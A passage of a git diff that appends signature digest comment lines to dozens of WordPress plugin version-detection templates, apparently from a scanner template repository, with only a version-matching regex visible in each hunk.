No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..79b5736424 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087e23acd4a4177dce4b0b2a79e85ab43ee5c11287d696fc42a58ee5b4840148b02207f850b69a5f07b4b056325bdaebf6779eafb8dfeedc2b6f396baef8e4470d64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..965e56753f 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022075c1dddf9a70a8706878bc3d54b07873385c43114cf777508da8879edaf0c826022100e7c6422d535ce054e291b0e02ab1a8c1611953ae85f39144712e79a3b9233d6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..d7e375754d 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220285e3cd9ab358ede051d7d18b730e1b980766236449f54b467bb4fd3652004f4022036faf3aee6d46a7409191639712b62155c3d054527ed9d20859beb315bc77422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..60854aa70f 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db65fb5913db67f2184b84d645c504556fec34a2ec487e585bd5a9359737b16f0220656799ee616826ab843ba1ad780181b4c313ecec294ee73f9056119cd4183fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..f9dc256742 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022010946f40808b25b3087b154bee2d92a29e2905f815988db0e72538059a322988022100ecd30893267c0eaeca135af555d46e0799826e0da200be008e5f004f5a4f2b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..41304e2041 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028d682c82b809e77e5c2dc813f48afa69fbf4b8c8387032d2bc523d147d1679102201e397e9ed3600a767873ae0f2dcfa0ec27fdec61d0653ddabc98abebcb726a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..85838db941 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203688a6cf4365354a23a33952bcbacfe8d2df5446d0078e3225b246bb4065b7130221009828e2fb09215bc5e13fe2a5b4611b6b648cb5bfd216b4010fee0ee44fac77c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..1535203cc0 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acddf8a6e85b00a7ae3873ca826e5970aa18c810c45d09813f94583860fdbcb2022100a2d6a0c6041ddbff3367b91a6198b7df1ceab65610af40ce958339ea071961bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..61b657f764 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dc5d8e52c3b958f3e2b145144dd3b090a3eeb3523d89d9109151f6b0f4051ebb0220196b7195e5c261edc83a8cb9080968d2dbb916f2bd32dfca665624d311df9b86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..21df8cec2d 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3f2ecd9eec04caf0fb007676543952b491dc71b24f9352fa617272cca0caa66022100cec7cedbc17abdb1e7cf67f58a882f94de07dfb6e75b6f58fd865b7f64cc2b56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..d7fa6d2caa 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f118d7f3f06e897042c96b60a95fa4417f4af15709663552b347c3dd66b4277022100e1435a9baf2d7961d375aa2691c019b5422e69f45d8c13c2796a8c57af4152a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..979e325834 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3b85815d70885bbbc6d257c7ecca351213962c91b0e558993f766fa7cdbd257022100fa825257c3b7b90fb28c7ce38ad4ef68acecfa81357f407edfbaf07115977fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..763b33b660 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220755011c469209c588eded736fcd32ab479374ef2f0f403a7fa8ee976a8cc7c1b02201f9bc34b2b4c221ee73541c8dc21c586e8cedd33b85e8634268f4c151142fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..7a9b82c625 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e05432e3edeb5c11b7c22efdabc12fade7bffb997e2ece55d3c783e7e61c0eb2022100df4fc2ff3cb0aa7efa335673dccad52fb38afb07e53a80f48da61514d7e11aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..0864394d02 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a5dfc62c4bd77645cae935d95bf268282afad038a4637b1706d7294e1171261022100f5a540150c966739180c4d46957b3c79aaab48a1112ebf9e10e681aab51c9e64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..ace69d621f 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c3bedddc13bd28b39da2c2bca7695678dacf946d860cf251c334f80cfaab45f8022100f5e4b92b4db38eb6fefe4c274fa014c8c2236ccb503a14d2998a8dce025c97de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..d6562fe5be 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a631a7142134a3a70f792f254db692631b390def25335eac94a591429c744f5602200f21c8604d8c36a21c08bc833f4a8ea54bec6acd985080d12a4175bb1045c26f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..0f26435fa4 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000a3fa2417607264b8264f50739c88338de7fea6439a93e80d8055aecb22eecb022100c270e10e34a4e296b3fbaad38b170a4d293c8974366ebd8bc72a0ebe0b4e4d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..2be22d8fcb 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207be231429679770720d13f1f6cd4769d91211c2c5d658c37d8e56481904fe497022015d31c8336ac81b6160f119b6b1f38f92bd7e809136289d78bcd86e804e16f06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..3665b5f9c5 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200fae3b24a23347e3039d0085fd6e7524ee088fa825cbb2bafbe9ea046dd35e8202202179ab7823eea7a825d7856452019c4c079777147533e81378f17bb367b305c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..18a5311bea 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093d56a7033ad661f7c38996ecaf70758bc63ed5891356d55480d217bd9a267c902201098e1cefee25b1eb37f01246726469cdee738b5ec12a357526816287e31cb6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..b71afc4415 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207fdacbbc7e17c8ba7d73efbe284ee860fa4852cfa55815c0b866496760005b570220720cc33c3861496f19591d97c0bc3b686ec4d46cbaf9c791b632a2df195942c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..bf956fda92 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b763ef0b627ffdd00861f63d9e6ddfd83668a75b985a90d3feb1364599eee6d0221009a952c7ad55f78297ce4954967a2a8b7802068c7aa0eb80f8f538b7829b30e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..5dc27dfbf8 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6185025a11933332e04ea60fd0bdb3f7fefdcead48b95d323c82f5cd805e33b0220148b06a675540b86b31d32647a2f3a6dd899a29c2cd50090265d54e2c542da9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..0acef41564 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ce1eeebf6bb0d21df9ed68fd31ab13b1e94bd23106ea041f1880d8d6970c53a70220028aea7ef937c8c94dc473a023a3bdb15bed3d8343dd179ee909e6918ad85b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..4b8f12f7dd 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069b2f6c9715a1bfe94ab44a0d0858aada976f0f808e8f128f1bea072838246de0221008043e24af301d5480c19a006323e13138a3139de2913c6f1e25722344761714d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..6966e9d212 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e88766c2c34e73a8cd62cb9ba322985f3c0c8e9a0b6003cac99ca89c5bd30f7b022075b93709f0d4aae957b18e0137933c0e07806e6b3300495c67c7773487b55049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..2d17b94072 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022061015b7f99dd9657018412a489e65cdf28d576da57b2c4809a3d5547b0ef209f022055c6ed09c5358dde9623412498eb7c948e43d5f7ef739290278e412b073151d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..0b5201d733 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c01ed5745d2c84fe949cc6da571fb5bab31bd5ca997a6fcaad4b25db0141cf8022006436c209b8a64789e9eede83daca386b9d9ae7236d07db52433a416a9c75c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..096d1adf54 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ccbb12edcf6b28a2b0db3066ca32de5c91e9230e2629eb9f20fab4721213d614022043fff676972e511fe44235306b48945620a1e1f20367b4ca6129e208a600f6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..70db6e9bd1 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073fd11fa5fde81d7eb4cb816ec25fdf4cf03ceaffa0641e66cbd7b1b36399fc202205e7891dc4d6592a061c19242dd67f87f0d27c122830645f86af4a13ccceb834f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..1c66f52de0 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fc68393c65a2b289659b2627db589caf0afdb94404fa51f18a893de7befa0264022100d284f3c395c38be590d67bd182ee7e6b6237d429fcbdf1ba1b68a227eacd142f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..77add18b70 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d152a8979b5c9632ca1d1aa042a1569aa326681f0c4324f62642a87acea1971a02207921525d19f8cff5ea48d5d5749dce72d038d74086c486d770132cdf34ffd513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..0b2a29a34d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ad26ba10d0c90df93f73fb49692bd8689fd619ab1c0fad402e0805aa3714c3b02202a47650f0c0f7ee7f947ddb7d5d21cdcac1744a233f429fac70cfcd9402c63e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..040ff060c6 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201cf252954ccefd208c94aacb4c95b8b4cfc200ecacdb230e3995cae40118e4bf022100ac2e7124a852afeac549ca5df2b98a0a422833435001ad3b53ab87508b1f2631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..321980822b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220723a466cdf6204175ec43712aaea9591c5c9e911932b57d37f27e070a5b880b3022100ea73f80d9413c2d486b10bffd96351d446dc72d0a1b5330a622adadf9523c8c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..1d9632e8a1 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044b3037027b1997617df0d8a9aea4800daeb00b9ec759823b14380b19d0848cf022036323b31532e4af002a328b0d15ca65b5b90be9d2445a970803842ffd34b55d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..1c15185800 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d5b7361cba850754aa203299aaf94c4a1c299d8b3ccc6e5fa887c65eb850ea8022100b23c18b15740e63bf8fe11a8988e7f59c0a271727162d7e02a576a67db270d92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..4f9a8a5339 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c477016fd0df766e74ed70efad3dba5e053632a3afbd52898dd4c481fe1fbdf022022d4e4128c1373960559e9cdc4bda0d815ddfc59cb87c0054444c0146e6a34aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..b05346a392 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205fb068721c7f620fc953014c5626a2660dee7d12f5235f63ae232c42d8d39edf022100fc472b16e7d94ed824105e58bec3333f03f07bf88f4bff173077911dc1cd57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..cbcd6eaca0 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202af2e8b9787fce2afeff42c68d2d99b120348ff2ec4aabf29e90801a66f6abfc0221008c84c879124d1e1e2970b3b82f0144811ee5e1e21133e4a17f246497e24bbb47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..af01cd7a99 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0fedb65fda625860b3edb4303b3fb4c0e162ccf34fbfa89014f7df9a2d232c7022076d29aa5f1fdfb11b9f2b5c456fa78919d5de879b1e1bd73a36438a4bdd188df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..7329b3b029 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9d6d81c20f991017f3124223e6862b9692e069a9959faa39e19c8a07731391e022100c3bce32805f85558636a57fb11cac6d911687038ec8447d5eb53cbbd8762d237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..f2ec9c13c4 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100de3e2243c193310f4e0973ebba1e4d973f6db48e4e8caa627d6eb12bfeda905b02205f7ba99a6fc6a1e177c7d4ce15c6c118ee69dd37aae63b565101ab61b575e67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..b8719a33f1 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008da62990914f26f6d6c9a23d5b9933db7e4390e583dbf364bcae18eaadda52fe02201361fb4421bfdd870700543fd175842c4b4ef1866bab0680887dd2d0864a6cf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..9d15a9ecc7 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220059ae7c69b49810167d19fad14adaeb2de024a850763b6c0b7bfb0b6ff4839d5022100d479cae8f921513ff2acff81a51c72f6a77f184f91830fe875ec5f00324b164f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..27f857f4e7 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce1515fad311fbd37d073ed7ac1e7bd25753204de659fbc213abb0d41e18f1ea022100eba17c30a6a8fa1882936ba389fad464a7ec4eb4d47d0dc03adbd609175b66dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 